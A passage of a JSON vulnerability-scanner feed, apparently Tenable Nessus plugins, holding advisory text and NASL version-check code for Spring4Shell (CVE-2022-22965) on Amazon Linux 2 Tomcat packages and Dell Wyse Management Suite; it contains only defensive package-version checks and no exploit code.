script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/09/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-servlet-4.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar alas_release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(alas_release) || !strlen(alas_release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d+|-\\d+)\", string:alas_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'tomcat-9.0.65-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat9'},\n {'reference':'tomcat-admin-webapps-9.0.65-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat9'},\n {'reference':'tomcat-docs-webapp-9.0.65-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat9'},\n {'reference':'tomcat-el-3.0-api-9.0.65-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat9'},\n {'reference':'tomcat-jsp-2.3-api-9.0.65-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat9'},\n {'reference':'tomcat-jsvc-9.0.65-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat9'},\n {'reference':'tomcat-lib-9.0.65-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat9'},\n {'reference':'tomcat-servlet-4.0-api-9.0.65-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat9'},\n {'reference':'tomcat-webapps-9.0.65-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat9'}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-04T14:42:56", "description": "The remote host contains a Spring Framework library version that is prior to 5.2.20 or 5.3.x prior to 5.3.18. It is, therefore, affected by a remote code execution vulnerability:\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n - These are the prerequisites for the exploit:\n - JDK 9 or higher\n - Apache Tomcat as the Servlet container\n - Packaged as WAR\n - spring-webmvc or spring-webflux dependency\n\nNote that users are required to enable the 'Show potential false alarms' setting, also known as paranoid mode, in their scan policy in order to enable this plugin in a scan. In addition, the 'Perform thorough tests' setting must be enabled as well.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-31T00:00:00", "type": "nessus", "title": "Spring Framework < 5.2.20 / 5.3.x < 5.3.18 Remote Code Execution (CVE-2022-22965)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2023-01-18T00:00:00", "cpe": ["cpe:/a:pivotal_software:spring_framework", "cpe:/a:vmware:spring_framework"], "id": "SPRING_CVE-2022-22965_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/159374", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159374);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/18\");\n\n script_cve_id(\"CVE-2022-22965\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n\n script_name(english:\"Spring Framework < 5.2.20 / 5.3.x < 5.3.18 Remote Code Execution (CVE-2022-22965)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application framework library that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a Spring Framework library version that is prior to 5.2.20 or 5.3.x prior to 5.3.18. It is,\ntherefore, affected by a remote code execution vulnerability:\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via\n data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application\n is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the\n nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n - These are the prerequisites for the exploit:\n - JDK 9 or higher\n - Apache Tomcat as the Servlet container\n - Packaged as WAR\n - spring-webmvc or spring-webflux dependency\n\nNote that users are required to enable the 'Show potential false alarms' setting, also known as paranoid mode, in their\nscan policy in order to enable this plugin in a scan. In addition, the 'Perform thorough tests' setting must be enabled\nas well.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tanzu.vmware.com/security/cve-2022-22965\");\n # https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?718f9ac3\");\n # https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2401ae46\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Spring Framework version 5.2.20 or 5.3.18 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/31\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"requires_paranoid_scanning\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pivotal_software:spring_framework\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:spring_framework\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"spring_jar_detection.nbin\", \"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\", \"java_jre_installed_unix.nbin\", \"java_jre_installed_win.nbin\");\n script_require_keys(\"installed_sw/Spring Framework\", \"installed_sw/Apache Tomcat\", \"installed_sw/Java\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('tomcat_version.inc');\n\nvar app_info = vcf::combined_get_app_info(app:'Spring Framework');\n\n# A vuln version of Java must be installed for the exploit to work\nvar java_exit_message = 'A vulnerable version of Java is not installed. Spring Framework is, therefore, not vulnerable.';\nvar java_install_count = get_install_count(app_name:'Java', exit_if_zero:FALSE);\nif (java_install_count < 1)\n exit(0, java_exit_message);\nvar java_installs = get_combined_installs(app_name:'Java');\nif (java_installs[0] != IF_OK)\n exit(0, java_exit_message);\n\n# JDK 9+ is vulnerable\n# Exit if all detected Java installs are < 9\nvar vuln_java = FALSE;\nforeach var java_install (java_installs[1])\n{\n var java_version = str_replace(string:java_install.version, find:'_', replace:'.');\n if ( ver_compare(ver:java_version, fix:'1.9.0', strict:FALSE) >= 0 )\n {\n vuln_java = TRUE;\n break;\n }\n}\n\nif (!vuln_java)\n exit(0, java_exit_message);\n\n# A \"vulnerable\" version of Tomcat must be installed for the exploit to work\nvar tomcat_exit_message = 'A vulnerable version of Apache Tomcat is not installed. Spring Framework is, therefore, not vulnerable.';\nvar tomcat_install_count = get_install_count(app_name:'Apache Tomcat', exit_if_zero:FALSE);\nif (tomcat_install_count < 1)\n exit(0, tomcat_exit_message);\nvar tomcat_installs = get_combined_installs(app_name:'Apache Tomcat');\nif (tomcat_installs[0] != IF_OK)\n exit(0, tomcat_exit_message);\n\n# Tomcat 10.0.20, 9.0.62, and 8.5.78 are patched\n# Exit if all detected Tomcat installs are patched\nvar vuln_tomcat = FALSE;\nforeach var install (tomcat_installs[1])\n{\n if (\n tomcat_ver_cmp(ver:install.version, fix:'10.0.20', same_branch:TRUE) < 0 ||\n tomcat_ver_cmp(ver:install.version, fix:'9.0.62', same_branch:TRUE) < 0 ||\n tomcat_ver_cmp(ver:install.version, fix:'8.5.78', same_branch:TRUE) < 0\n )\n {\n vuln_tomcat = TRUE;\n break;\n }\n}\n\nif (!vuln_tomcat)\n exit(0, tomcat_exit_message);\n\n# Non-default configuration\nif (report_paranoia < 2) \n audit(AUDIT_PARANOID);\n\nvar constraints = [\n { 'fixed_version':'5.2.20' },\n { 'min_version':'5.3', 'fixed_version':'5.3.18' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-03T19:11:38", "description": "The version of tomcat installed on the remote host is prior to 8.5.79-1. It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2TOMCAT8.5-2023-005 advisory.\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. (CVE-2022-22965)\n\n - The documentation of Apache Tomcat 10.1.0-M1 to 10.1.0-M14, 10.0.0-M1 to 10.0.20, 9.0.13 to 9.0.62 and 8.5.38 to 8.5.78 for the EncryptInterceptor incorrectly stated it enabled Tomcat clustering to run over an untrusted network. This was not correct. While the EncryptInterceptor does provide confidentiality and integrity protection, it does not protect against all risks associated with running over any untrusted network, particularly DoS risks. (CVE-2022-29885)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-09-27T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : tomcat (ALASTOMCAT8.5-2023-005)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965", "CVE-2022-29885"], "modified": "2023-10-02T00:00:00", "cpe": ["cpe:/o:amazon:linux:2", "p-cpe:/a:amazon:linux:tomcat", "p-cpe:/a:amazon:linux:tomcat-admin-webapps", "p-cpe:/a:amazon:linux:tomcat-docs-webapp", "p-cpe:/a:amazon:linux:tomcat-javadoc", "p-cpe:/a:amazon:linux:tomcat-jsvc", "p-cpe:/a:amazon:linux:tomcat-lib", "p-cpe:/a:amazon:linux:tomcat-webapps", "p-cpe:/a:amazon:linux:tomcat-el-3.0-api", "p-cpe:/a:amazon:linux:tomcat-jsp-2.3-api", "p-cpe:/a:amazon:linux:tomcat-servlet-3.1-api"], "id": "AL2_ALASTOMCAT8_5-2023-005.NASL", "href": "https://www.tenable.com/plugins/nessus/181988", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALASTOMCAT8.5-2023-005.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(181988);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/02\");\n\n script_cve_id(\"CVE-2022-22965\", \"CVE-2022-29885\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n script_xref(name:\"IAVA\", value:\"2022-A-0222-S\");\n\n script_name(english:\"Amazon Linux 2 : tomcat (ALASTOMCAT8.5-2023-005)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of tomcat installed on the remote host is prior to 8.5.79-1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the ALAS2TOMCAT8.5-2023-005 advisory.\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution\n (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR\n deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not\n vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be\n other ways to exploit it. (CVE-2022-22965)\n\n - The documentation of Apache Tomcat 10.1.0-M1 to 10.1.0-M14, 10.0.0-M1 to 10.0.20, 9.0.13 to 9.0.62 and\n 8.5.38 to 8.5.78 for the EncryptInterceptor incorrectly stated it enabled Tomcat clustering to run over an\n untrusted network. This was not correct. While the EncryptInterceptor does provide confidentiality and\n integrity protection, it does not protect against all risks associated with running over any untrusted\n network, particularly DoS risks. (CVE-2022-29885)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALASTOMCAT8.5-2023-005.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-22965.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-29885.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/faqs.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update tomcat' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/09/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"III\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar alas_release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(alas_release) || !strlen(alas_release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d+|-\\d+)\", string:alas_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'tomcat-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'},\n {'reference':'tomcat-admin-webapps-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'},\n {'reference':'tomcat-docs-webapp-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'},\n {'reference':'tomcat-el-3.0-api-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'},\n {'reference':'tomcat-javadoc-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'},\n {'reference':'tomcat-jsp-2.3-api-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'},\n {'reference':'tomcat-jsvc-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'},\n {'reference':'tomcat-lib-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'},\n {'reference':'tomcat-servlet-3.1-api-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'},\n {'reference':'tomcat-webapps-8.5.79-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'tomcat8.5'}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-04T14:48:32", "description": "The version of Dell Wyse Management Suite installed on the remote host is prior to tested version. It is, therefore, affected by multiple vulnerabilities as referenced in the DSA-2022-098 advisory.\n\n - The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self- signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). (CVE-2022-0778)\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. (CVE-2022-22965)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-06-08T00:00:00", "type": "nessus", "title": "Dell Wyse Management Suite < 3.6.1 Multiple Vulnerabilities (DSA-2022-098)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-0778", "CVE-2022-22965"], "modified": "2023-01-18T00:00:00", "cpe": ["cpe:/a:dell:wyse_management_suite"], "id": "DELL_WYSE_MANAGEMENT_SUITE_DSA-2022-098.NASL", "href": "https://www.tenable.com/plugins/nessus/161952", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161952);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/18\");\n\n script_cve_id(\"CVE-2022-0778\", \"CVE-2022-22965\");\n script_xref(name:\"IAVA\", value:\"2022-A-0121-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n\n script_name(english:\"Dell Wyse Management Suite < 3.6.1 Multiple Vulnerabilities (DSA-2022-098)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Dell Wyse Management Suite installed on the local host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Dell Wyse Management Suite installed on the remote host is prior to tested version. It is, therefore,\naffected by multiple vulnerabilities as referenced in the DSA-2022-098 advisory.\n\n - The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop\n forever for non-prime moduli. Internally this function is used when parsing certificates that contain\n elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point\n encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has\n invalid explicit curve parameters. Since certificate parsing happens prior to verification of the\n certificate signature, any process that parses an externally supplied certificate may thus be 